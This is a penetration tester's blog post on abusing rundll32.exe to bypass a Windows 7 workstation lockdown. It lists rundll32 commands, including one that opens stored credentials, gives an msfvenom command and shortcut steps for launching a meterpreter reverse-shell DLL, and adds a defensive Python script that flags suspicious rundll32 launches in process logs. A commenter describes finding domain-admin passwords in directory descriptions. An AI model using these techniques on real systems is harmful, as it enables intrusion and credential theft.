Feb 11

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively: file and folder permissions, service permissions and AppLocker rules prevented the majority of malicious actions.

However, I found that I was able to utilise rundll32.exe to attempt to enumerate/manipulate the environment. I couldn’t really find a good pentest-related resource for leveraging rundll32, so I thought I’d put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, but it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command / function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity; in reality you’re unlikely to have cmd.exe (or PowerShell) access, and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll,KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32 Shell32.dll,OpenAs_RunDLL file.abc – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (Subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery,OpenQueryWindow – Find Users (New targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
RunDll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Stevens has produced a nice write-up on taking a third-party command interpreter and converting it from .exe to .dll; for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe. The steps to do this are as follows:

1. Upload Didier Stevens’ cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option to abuse rundll32 may be to upload a Metasploit-derived .dll. The steps to do this are as follows:

1. Create our reverse_shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse_shell payload .dll file to our target system (e.g. over HTTP)

3. Start our reverse listener on our pentest host via Metasploit’s: /exploit/multi/handler

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, and we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂
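From the defender’s side, the common thread running through the command list above and the cmd.dll / pentest.dll shortcuts is that rundll32.exe is a signed system binary, so an AppLocker executable rule never stops it; what separates a harmless Taskbar Options dialog from a meterpreter session is which DLL it was asked to load and from where. The following Python is an added example, not code from the original post: it parses rundll32 command lines out of process-creation records, and rates each launch as high (DLL loaded from a path outside the Windows system directories, the upload-a-DLL pattern), medium (system DLL, but an entry point from the list above that exposes stored credentials or a directory user search) or low (everything else). The pipe-delimited log format, the host/user name WS01\test123 and the timestamps are constructed for the demonstration; the script also assumes the default C:\Windows system root and that a bare DLL name such as shell32.dll resolves to the system copy.

```python
"""Triage rundll32 launches from workstation process-creation logs.

Added example, not code from the original post. The log format
(time|user|command line), the host/user names and the timestamps are
constructed for the demonstration.
"""
import re

# Directories treated as trusted system locations. Assumes the default
# C:\Windows system root; adjust if the image lives elsewhere.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Entry points from the post that expose data worth reviewing on their own.
SENSITIVE_ENTRYPOINTS = {
    "krshowkeymgr": "Stored Usernames/Passwords dialog (keymgr.dll)",
    "openquerywindow": "Find Users directory search dialog (dsquery)",
}

# rundll32, optionally quoted and/or given with a full path, then its arguments.
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.IGNORECASE
)
# <dll>[,]<entry> [args]: an unquoted DLL spec ends at the first comma or space,
# a quoted one (path with spaces) at the closing quote.
ARGS_RE = re.compile(r'(?:"([^"]+)"|([^,\s]+))\s*,?\s*(\S+)?\s*(.*)')


def parse_rundll32(cmdline):
    """Return (dll, entrypoint, args) for a rundll32 command line, else None."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    a = ARGS_RE.match(m.group(1).strip())
    if not a:
        return None
    dll = a.group(1) or a.group(2)
    return dll, a.group(3) or "", a.group(4).strip()


def rate_event(dll, entry):
    """Classify one parsed invocation as (severity, reason)."""
    dll_l = dll.lower()
    if "\\" in dll_l or "/" in dll_l:
        # An explicit path: anything outside the system directories is a DLL the
        # user could have written there (the cmd.dll / pentest.dll pattern).
        if not dll_l.startswith(SYSTEM_DIRS):
            return "high", "DLL loaded from non-system path: " + dll
    # A bare name (shell32.dll, dsquery) is assumed here to resolve to the
    # system copy via the loader's search order.
    if entry.lower() in SENSITIVE_ENTRYPOINTS:
        return "medium", SENSITIVE_ENTRYPOINTS[entry.lower()]
    return "low", "rundll32 call into a system DLL"


def triage(lines):
    """Parse 'time|user|cmdline' lines and return one finding per rundll32 launch."""
    findings = []
    for line in lines:
        ts, user, cmdline = line.split("|", 2)
        parsed = parse_rundll32(cmdline)
        if parsed is None:
            continue  # not a rundll32 launch
        dll, entry, args = parsed
        severity, reason = rate_event(dll, entry)
        findings.append({"time": ts, "user": user, "dll": dll, "entry": entry,
                         "args": args, "severity": severity, "reason": reason})
    return findings


# Constructed process-creation records mirroring the post's commands.
SAMPLE_LOG = [
    "09:01:10|WS01\\test123|C:\\Windows\\System32\\rundll32.exe shell32.dll,Options_RunDLL 7",
    "09:02:33|WS01\\test123|rundll32.exe keymgr.dll, KRShowKeyMgr",
    "09:03:05|WS01\\test123|rundll32.exe dsquery,OpenQueryWindow",
    "09:05:41|WS01\\test123|C:\\Windows\\System32\\rundll32.exe c:\\users\\test123\\desktop\\pentest.dll,Control_RunDLL",
    '09:06:02|WS01\\test123|"C:\\Windows\\System32\\notepad.exe" notes.txt',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['severity']:<6} {f['time']} {f['user']} {f['dll']},{f['entry']} "
              f"{f['args']} <- {f['reason']}")
```

Run against the constructed records it reports the Options_RunDLL call as low, the KRShowKeyMgr and OpenQueryWindow calls as medium and the pentest.dll launch as high, while the notepad launch is ignored. Triage like this only tells you after the fact; the preventive control for the upload-a-DLL case is an AppLocker DLL rule collection that restricts which paths rundll32 may load from, and in a shortcut-driven lockdown the parent process of these launches will normally be explorer.exe, which is a useful extra field to log.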

By way of further reading, JavaScript can also be called through rundll32.exe; check out the following post:


1 comment

  1. scriptmonkey

    Wish I had thought to look at your site prior to a job I had yesterday. Spent a while phone googling for an answer to pop the dsquery box up.

    Good point regarding that one: the description field, filter on “exists” and go reading, often find dev accounts with passwords written in the comments, found 3 accounts yesterday, 1 with DA. boof. 🙂

    P.S. VPN post is a third written, long way to go especially as the new wordpress v4.0 managed to lose half a draft it seems. 🙁 Also didn’t realise I never had you added to my interesting links section, will throw you in it.
